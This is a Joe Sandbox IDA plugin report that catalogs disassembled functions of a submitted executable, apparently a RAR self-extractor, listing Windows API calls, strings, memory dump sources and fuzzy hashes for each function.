Opcode Fuzzy Hash: aec652aad98712bc9504fbb49be1991999bf2b285a3eeb7c4c2c70fad8b446df
Instruction Fuzzy Hash: C501F7321083326EAA7B29F8BC84A6B2F9DFF55774B60077AF5D0490D4EF1A48009344

Function 010297E5 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,01041030,01024674,01041030,?,?,01023F73,00000050,?,01041030,00000200), ref: 010297E9
_free.LIBCMT ref: 0102981C
_free.LIBCMT ref: 01029844
SetLastError.KERNEL32(00000000,?,01041030,00000200), ref: 01029851
SetLastError.KERNEL32(00000000,?,01041030,00000200), ref: 0102985D
_abort.LIBCMT ref: 01029863

Memory Dump Source

Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: f9bd05b72c0f2ed03307d0bf2f0669ed10d9bc7c4bd2694b1c81eabbd4e52be8
Instruction ID: fef6a1ff4ba0ac7d96841ccccfb77500a72f15c4e6cfb2b33daae18bd342465a
Opcode Fuzzy Hash: f9bd05b72c0f2ed03307d0bf2f0669ed10d9bc7c4bd2694b1c81eabbd4e52be8
Instruction Fuzzy Hash: 23F02D35100633E6D7633238BC48B5B2BEDAFE0778F290125F7D496145EE7584068224

Function 0101DC3B Relevance: 9.0, APIs: 6, Instructions: 42windowsynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,0000000A), ref: 0101DC47
PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0101DC61
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0101DC72
TranslateMessage.USER32(?), ref: 0101DC7C
DispatchMessageW.USER32(?), ref: 0101DC86
WaitForSingleObject.KERNEL32(?,0000000A), ref: 0101DC91

Memory Dump Source

Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd

Similarity

API ID: Message$ObjectSingleWait$DispatchPeekTranslate
String ID:
API String ID: 2148572870-0
Opcode ID: 635f22a92cb027aa0703d0f65f06501b797d68e9e0d30b2249c1231a59e6a566
Instruction ID: d24f8354f28d46ca2992a11095e7357c1ccffc76a57a4ffd0eac8bcd5c2e9692
Opcode Fuzzy Hash: 635f22a92cb027aa0703d0f65f06501b797d68e9e0d30b2249c1231a59e6a566
Instruction Fuzzy Hash: 8BF08C32A0021ABBDB306AE5EC4CDCBBFBCFF42791B004411F54AD6018D63A804AC7E0

Function 0100C0C5 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 148COMMON

Download Yara Rule

APIs

Part of subcall function 010105DA: _wcslen.LIBCMT ref: 010105E0

Part of subcall function 0100B92D: _wcsrchr.LIBVCRUNTIME ref: 0100B944

_wcslen.LIBCMT ref: 0100C197
_wcslen.LIBCMT ref: 0100C1DF

Strings

.rar, xrefs: 0100C0E1, 0100C134
.exe, xrefs: 0100C10B
.sfx, xrefs: 0100C11A

Memory Dump Source

Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd

Similarity

API ID: _wcslen$_wcsrchr
String ID: .exe$.rar$.sfx
API String ID: 3513545583-31770016
Opcode ID: 76a10fb00ac954ed3ccca9f16ff187693d838d8b44eaa8a3e2464dfa2e60e0e2
Instruction ID: f8fdc0eb304a38a48822d4014724dbe1f3f42bbe1e60aee1189b1e60e97c2f4e
Opcode Fuzzy Hash: 76a10fb00ac954ed3ccca9f16ff187693d838d8b44eaa8a3e2464dfa2e60e0e2
Instruction Fuzzy Hash: 3C414821540312A6F733AF788A41ABB77E8EF42704F100ACEF9C56B4C0EB6449C2C391

Function 0101CE87 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 133COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000800,?), ref: 0101CE9D

Part of subcall function 0100B690: _wcslen.LIBCMT ref: 0100B696

_swprintf.LIBCMT ref: 0101CED1

Part of subcall function 01004092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 010040A5

SetDlgItemTextW.USER32(?,00000066,0104946A), ref: 0101CEF1
EndDialog.USER32(?,00000001), ref: 0101CFFE

Strings

%s%s%u, xrefs: 0101CEC6

Memory Dump Source

Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd

Similarity

API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcslen
String ID: %s%s%u
API String ID: 110358324-1360425832
Opcode ID: 0c0ea83e644ad4615165ca0aeade4673aae32a78bc128b18b27bfe0b96427931
Instruction ID: 2a6ccd115dbcf8699bc6ce260b7aa61646cbd0c5dabdd4af58eddabe270d4c14
Opcode Fuzzy Hash: 0c0ea83e644ad4615165ca0aeade4673aae32a78bc128b18b27bfe0b96427931
Instruction Fuzzy Hash: 3541A8B1940659AADF219B94CD44EEE77FCEB45300F4080A6F989E7049DE798A44CF60

Function 0100BB03 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 127COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0100BB27
GetCurrentDirectoryW.KERNEL32(000007FF,?,?,?,?,00000000,?,?,0100A275,?,?,00000800,?,0100A23A,?,0100755C), ref: 0100BBC5
_wcslen.LIBCMT ref: 0100BC3B

Strings

UNC, xrefs: 0100BBA7
\\?\, xrefs: 0100BB52, 0100BB99, 0100BBF7, 0100BC4E

Memory Dump Source

Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd

Similarity

API ID: _wcslen$CurrentDirectory
String ID: UNC$\\?\
API String ID: 3341907918-253988292
Opcode ID: b0b66b5bd8b20d0bbfacba301a61c41478c93a00fcbf4c3ee7ee8713044c90e6
Instruction ID: 5968d4eefcf2566524364e8e65dac9968c17bf7c32b67e8de69d086888e5e094
Opcode Fuzzy Hash: b0b66b5bd8b20d0bbfacba301a61c41478c93a00fcbf4c3ee7ee8713044c90e6
Instruction Fuzzy Hash: EA419F3944021BA6EF22AF64CC40EEE77ADBF55390F1044A6F9D4A7294EF74D9908B60

Function 01027F6E Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 116COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\9FwQYJSj4N.exe,00000104), ref: 01027FAE
_free.LIBCMT ref: 01028079
_free.LIBCMT ref: 01028083

Strings

%I, xrefs: 01027FB4
C:\Users\user\Desktop\9FwQYJSj4N.exe, xrefs: 01027FA5, 01027FAC, 01027FDB, 01028013

Memory Dump Source

Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\Desktop\9FwQYJSj4N.exe$%I
API String ID: 2506810119-140885748
Opcode ID: f98c2519891f6ffa1db06158ead117b78a189c56f67a1307969db595f9bacc7e
Instruction ID: cf22fffd97cf6ec76734889ef236c0dfa12372b9c171a01b559e565830542d4a
Opcode Fuzzy Hash: f98c2519891f6ffa1db06158ead117b78a189c56f67a1307969db595f9bacc7e
Instruction Fuzzy Hash: 3C31A275A04229EFDB61DF99D880D9EBBFCEF99310F1080ABF98497210D6759A40CB51

Function 0101B6DD Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58windowCOMMON

Download Yara Rule

APIs

LoadBitmapW.USER32(00000065), ref: 0101B6ED
GetObjectW.GDI32(00000000,00000018,?), ref: 0101B712
DeleteObject.GDI32(00000000), ref: 0101B744
DeleteObject.GDI32(00000000), ref: 0101B767

Part of subcall function 0101A6C2: FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,0101B73D,00000066), ref: 0101A6D5
Part of subcall function 0101A6C2: SizeofResource.KERNEL32(00000000,?,?,?,0101B73D,00000066), ref: 0101A6EC
Part of subcall function 0101A6C2: LoadResource.KERNEL32(00000000,?,?,?,0101B73D,00000066), ref: 0101A703
Part of subcall function 0101A6C2: LockResource.KERNEL32(00000000,?,?,?,0101B73D,00000066), ref: 0101A712
Part of subcall function 0101A6C2: GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,?,0101B73D,00000066), ref: 0101A72D
Part of subcall function 0101A6C2: GlobalLock.KERNEL32(00000000), ref: 0101A73E
Part of subcall function 0101A6C2: CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 0101A762
Part of subcall function 0101A6C2: GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 0101A7A7
Part of subcall function 0101A6C2: GlobalUnlock.KERNEL32(00000000), ref: 0101A7C6
Part of subcall function 0101A6C2: GlobalFree.KERNEL32(00000000), ref: 0101A7CD

Strings

], xrefs: 0101B71A

Memory Dump Source

Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd

Similarity

API ID: Global$Resource$Object$BitmapCreateDeleteLoadLock$AllocFindFreeFromGdipSizeofStreamUnlock
String ID: ]
API String ID: 1797374341-3352871620
Opcode ID: ae5ecf9b75a10d4d7da9c217500736ffdf6033197dcdf0fb0c075fbf8ff90d59
Instruction ID: 16b712900256b6ea0c26d4577ff3b0f1e10799bc8fd98efc3037b37251e17052
Opcode Fuzzy Hash: ae5ecf9b75a10d4d7da9c217500736ffdf6033197dcdf0fb0c075fbf8ff90d59
Instruction Fuzzy Hash: 9901D636641202A7E72277785D08ABF7AF9BF80662F080050F9C4A729CDF7E8C0946A0

Function 0101D600 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

Part of subcall function 01001316: GetDlgItem.USER32(00000000,00003021), ref: 0100135A
Part of subcall function 01001316: SetWindowTextW.USER32(00000000,010335F4), ref: 01001370

EndDialog.USER32(?,00000001), ref: 0101D64B
GetDlgItemTextW.USER32(?,00000068,00000800), ref: 0101D661
SetDlgItemTextW.USER32(?,00000066,?), ref: 0101D675
SetDlgItemTextW.USER32(?,00000068), ref: 0101D684

Strings

RENAMEDLG, xrefs: 0101D618

Memory Dump Source

Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd

Similarity

API ID: ItemText$DialogWindow
String ID: RENAMEDLG
API String ID: 445417207-3299779563
Opcode ID: 161be61dd898c24d4190d888df394bb54aa98793f0892a02384ae133e55ce86c
Instruction ID: 3da7e24464a8ba92c67c79d341b1c875edef76f88cc7230921703cb23582bbf6
Opcode Fuzzy Hash: 161be61dd898c24d4190d888df394bb54aa98793f0892a02384ae133e55ce86c
Instruction Fuzzy Hash: AD01F933244310BAE3214FA85E0DF5B7B9CBB5E701F010810F3C5A509DC7AF95048765

Function 01027E73 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,01027E24,00000000,?,01027DC4,00000000,0103C300,0000000C,01027F1B,00000000,00000002), ref: 01027E93
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 01027EA6
FreeLibrary.KERNEL32(00000000,?,?,?,01027E24,00000000,?,01027DC4,00000000,0103C300,0000000C,01027F1B,00000000,00000002), ref: 01027EC9

Strings

CorExitProcess, xrefs: 01027E9E
mscoree.dll, xrefs: 01027E8C

Memory Dump Source

Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: bdce330b80cc37e42e94380c6ad34d1fb2746e514979a0ce2100e0e9e08e0cd5
Instruction ID: 9d8f774f1337a7ca9331fd5aafe7b40034a9611998c0449c968f6364b85c0149
Opcode Fuzzy Hash: bdce330b80cc37e42e94380c6ad34d1fb2746e514979a0ce2100e0e9e08e0cd5
Instruction Fuzzy Hash: 5CF06831900218BBDF219FA5DC49B9EBFBDFF44715F0041A9F845A6254DB3A9E44CBA0

Function 0100F2C5 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 20libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 0101081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 01010836
Part of subcall function 0101081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0100F2D8,Crypt32.dll,00000000,0100F35C,?,?,0100F33E,?,?,?), ref: 01010858

GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0100F2E4
GetProcAddress.KERNEL32(010481C8,CryptUnprotectMemory), ref: 0100F2F4

Strings

CryptProtectMemory, xrefs: 0100F2DE
CryptUnprotectMemory, xrefs: 0100F2EA
Crypt32.dll, xrefs: 0100F2CE

Memory Dump Source

Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd

Similarity

API ID: AddressProc$DirectoryLibraryLoadSystem
String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
API String ID: 2141747552-1753850145
Opcode ID: d2af7a02f29de3c501a169e9c0e257e1cb74f16cd946a1c11bdb634f8cfd66fe
Instruction ID: 4dc47194e12eb4000521233aebb11717160d793e7e853d70aeab022ca3f212dc
Opcode Fuzzy Hash: d2af7a02f29de3c501a169e9c0e257e1cb74f16cd946a1c11bdb634f8cfd66fe
Instruction Fuzzy Hash: 09E04F70D10B029ED7319B799588B41BAD87F44610F14885DF0DADB645DBB9D0818B50

Function 01022BDA Relevance: 7.7, APIs: 5, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 01022CA1
___AdjustPointer.LIBCMT ref: 01022CC4
_abort.LIBCMT ref: 01022D12
___AdjustPointer.LIBCMT ref: 01022D60

Memory Dump Source

Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd

Similarity

API ID: AdjustPointer$_abort
String ID:
API String ID: 2252061734-0
Opcode ID: ef8d6e5f8792956ed721b2ade7b1d68ecd13fa61206d3958992df28c7f00af28
Instruction ID: d77efd25ce6cdc8946388eb885a86333e916e2e7f5dd8850480e39ebe6793ff3
Opcode Fuzzy Hash: ef8d6e5f8792956ed721b2ade7b1d68ecd13fa61206d3958992df28c7f00af28
Instruction Fuzzy Hash: DF510671600326AFEB29AFD8D840BBAB7E4FF54310F24416DED85476A1D772E950CB90

Function 0102BF30 Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 0102BF39
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0102BF5C

Part of subcall function 01028E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0102CA2C,00000000,?,01026CBE,?,00000008,?,010291E0,?,?,?), ref: 01028E38

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0102BF82
_free.LIBCMT ref: 0102BF95
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0102BFA4

Memory Dump Source

Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: 5fa63b5fd0b03ffceafaec370d5b210590d901ffac9b67981e17d3dd9a6d25c8
Instruction ID: 16c463447fe1139e3b3a2d5e9b34ac76e51a92e10dc0e862056522a5c2d1192e
Opcode Fuzzy Hash: 5fa63b5fd0b03ffceafaec370d5b210590d901ffac9b67981e17d3dd9a6d25c8
Instruction Fuzzy Hash: 0D01D476601A317F3761157A5C8CDBB7FBDEEC2AA03140169FA84C6104EA668C0186B0

Function 01029869 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,01041030,00000200,010291AD,0102617E,?,?,?,?,0100D984,?,?,?,00000004,0100D710,?), ref: 0102986E
_free.LIBCMT ref: 010298A3
_free.LIBCMT ref: 010298CA
SetLastError.KERNEL32(00000000,01033A34,00000050,01041030), ref: 010298D7
SetLastError.KERNEL32(00000000,01033A34,00000050,01041030), ref: 010298E0

Memory Dump Source

Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 2e990b45331276d0357e645e84872e35f69a080690b638a0c986e424f91b7eff
Instruction ID: 94d8680c7ce6faa034e6ead7d51b6d70e6d318dffdf4a77fe5ba452f01adc7ac
Opcode Fuzzy Hash: 2e990b45331276d0357e645e84872e35f69a080690b638a0c986e424f91b7eff
Instruction Fuzzy Hash: 67012D36244632EBD3333238ACC4A5F26ADFFD167CF280136F5C596181EEB588064230

Function 01010EED Relevance: 7.5, APIs: 5, Instructions: 43COMMON

Download Yara Rule

APIs

Part of subcall function 010111CF: ResetEvent.KERNEL32(?), ref: 010111E1
Part of subcall function 010111CF: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 010111F5

ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 01010F21
CloseHandle.KERNEL32(?,?), ref: 01010F3B
DeleteCriticalSection.KERNEL32(?), ref: 01010F54
CloseHandle.KERNEL32(?), ref: 01010F60
CloseHandle.KERNEL32(?), ref: 01010F6C

Part of subcall function 01010FE4: WaitForSingleObject.KERNEL32(?,000000FF,01011206,?), ref: 01010FEA
Part of subcall function 01010FE4: GetLastError.KERNEL32(?), ref: 01010FF6

Memory Dump Source

Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd

Similarity

API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
String ID:
API String ID: 1868215902-0
Opcode ID: 1c885d480c9c6eb4fcda13a2ba25f042eb0067a70e54a506de004dde64853db1
Instruction ID: cd916ecec26834747e6e91f96997fdd2ab17f6b7fc3b79949b52777181375708
Opcode Fuzzy Hash: 1c885d480c9c6eb4fcda13a2ba25f042eb0067a70e54a506de004dde64853db1
Instruction Fuzzy Hash: D5014C76500B44EBC7229B65D8C5BC6FBADFB08711F00092DF2EA96558CB7A6984CB90

Function 0102C7FF Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0102C817

Part of subcall function 01028DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0102C896,01033A34,00000000,01033A34,00000000,?,0102C8BD,01033A34,00000007,01033A34,?,0102CCBA,01033A34), ref: 01028DE2
Part of subcall function 01028DCC: GetLastError.KERNEL32(01033A34,?,0102C896,01033A34,00000000,01033A34,00000000,?,0102C8BD,01033A34,00000007,01033A34,?,0102CCBA,01033A34,01033A34), ref: 01028DF4

_free.LIBCMT ref: 0102C829
_free.LIBCMT ref: 0102C83B
_free.LIBCMT ref: 0102C84D
_free.LIBCMT ref: 0102C85F

Memory Dump Source

Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
